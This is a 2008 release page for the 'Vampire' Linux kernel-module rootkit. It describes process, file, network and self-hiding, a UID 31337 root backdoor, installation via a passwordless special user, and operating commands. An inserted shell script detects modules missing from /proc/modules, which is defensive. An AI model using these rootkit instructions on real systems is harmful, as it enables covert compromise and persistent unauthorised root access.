Vampire
Submitted by Bitlackeys on Wed, 05/21/2008 - 12:19
Author: Ryan J. O'Neill - Ryan@bitlackeys.com
News: Vampire 0.2 is available for download here!
-[About]-
Vampire is a loadable kernel module (LKM) rootkit for the Linux 2.6 kernel. It is less than elegant code, quickly designed
as a means to commence and test a security project that I am working on called Ktraq.
Vampire includes the following features, all very common to previous LKM rootkits:
- Process hiding: Any number of processes that you want hidden become invisible in /proc
- Network session hiding: Any service or session of any type that you want hidden is invisible to netstat
- File hiding: Files that you want hidden become invisible and cannot be opened.
- Directory privacy: Your directories cannot be accessed and appear not to exist
- Root backdoor: Logging in as the special user with UID 31337 drops you to uid 0
- Vampire hides itself from /proc/modules
- The special user with UID 31337 can see and access the hidden files through the vampire client,
which is a program that manipulates the hooked version of setuid to let you execute commands as the special user.
- The special user cannot be seen in /etc/passwd
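The self-hiding feature above removes the module from the list that /proc/modules (and therefore lsmod) reads, but the kernel's sysfs view of loaded modules is kept separately, so a defender can compare the two. The following script is an added detection example, not part of the Vampire release or the Ktraq project; the function names, the sample module names and the sample listing are constructed for the demonstration.

```shell
#!/bin/sh
# Added defensive example (not code from the Vampire release): report loadable
# modules that sysfs knows about but that are missing from /proc/modules.
# A module that unlinks itself from the kernel's module list (the trick behind
# vanishing from lsmod) normally still leaves its /sys/module/<name> directory
# behind, so the two views disagree.

# hidden_modules PROC_MODULES_FILE SYS_MODULE_DIR
#   PROC_MODULES_FILE: a file in /proc/modules format (name size refcnt deps state addr)
#   SYS_MODULE_DIR:    a directory laid out like /sys/module (one subdirectory per module)
# Prints one name per line for each loadable module present in sysfs but absent
# from the /proc/modules listing. Built-in modules also get a /sys/module entry
# when they expose parameters, but only loadable modules carry an 'initstate'
# file, so that file is used to tell the two apart.
hidden_modules() {
    proc_list="$1"
    sys_dir="$2"
    for entry in "$sys_dir"/*; do
        [ -d "$entry" ] || continue
        [ -f "$entry/initstate" ] || continue   # skip built-in modules
        name=$(basename "$entry")
        # the module name is the first field of each /proc/modules line
        if ! awk -v n="$name" '$1 == n { found = 1 } END { exit !found }' "$proc_list"; then
            echo "$name"
        fi
    done
}

# Constructed sample data standing in for the live /proc and /sys views:
# ext4 and loop are listed in both, 'vampire' only exists in sysfs, and
# printk is a built-in module (no initstate file) that must not be reported.
demo() {
    tmp=$(mktemp -d)
    printf 'ext4 123456 1 - Live 0xffffffffc0000000\nloop 32768 0 - Live 0xffffffffc0100000\n' > "$tmp/modules"
    for m in ext4 loop vampire; do
        mkdir -p "$tmp/sys/$m"
        echo live > "$tmp/sys/$m/initstate"
    done
    mkdir -p "$tmp/sys/printk"
    hidden_modules "$tmp/modules" "$tmp/sys"
    rm -rf "$tmp"
}

# On a live system: hidden_modules /proc/modules /sys/module
```

The check only catches a module that removed itself from the module list without also tearing down its sysfs entry; a rootkit that cleans up both leaves no discrepancy here, so this belongs alongside other checks (for example comparing the running sys_call_table entries against the addresses in the matching System.map) rather than replacing them.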
-[Installation]-
In order to use this rootkit effectively, it needs to know the address of the sys_call_table,
because it is no longer exported in the 2.6 kernel. I have decided to leave this up to the user,
as it is very easy to find in /boot/System.map, and the method that automatically locates
the sys_call_table has not always been reliable for me. Make sure that you grep for it in the correct
System.map file (meaning the one for the kernel version you are running). This will get them all:
cat /boot/*ystem*.map* | grep sys_call_table | awk -F ' ' '{print $1}'
Open up vampire.c and assign the address to 'unsigned long sc_address':
'unsigned long sc_address = 0xc03544e0;'
While you're in vampire.c, customize the arrays so that they contain the files, processes, and services that you want hidden. It is very self-explanatory.
#define P_COUNT 2 /* number of hidden processes */
const char *p_array[] = { "sniffer", "trojan", "NULL" };
Make sure to leave the string that says NULL, but don't count it as a process. This is lazy programming,
and if I feel like it I'll add a feature to the client that allows you to add them on the fly. You may
add as many elements as you like.
To install the rootkit, just use the install script. This will compile the code, create the special
user account with no password, and insert the module. Uninstall will do the opposite =)
After the rootkit is installed, keep in mind that you can see and access the elements that are otherwise hidden
with the special UID 31337. This will _only_ work if you use the 'vc' program to execute commands. Logging in
or switching to the user elite will only drop you to a root shell. To employ the benefits of that user, you must
use the following syntax: ./vc +cmd 31337 (command)
For example, this is the only way that you can tell the rootkit is installed:
# ./vc +cmd 31337 lsmod | grep vampire
That's basically it. It's worth noting that some newer Linux kernels use setuid32() and some don't. If you get compile errors about setuid32(), then comment out the system call hooking and unhooking of that function. Vampire has implemented both versions, so no worries. See the README for more details on this. This rootkit is part of a much larger security project that is in early development and can be expected soon.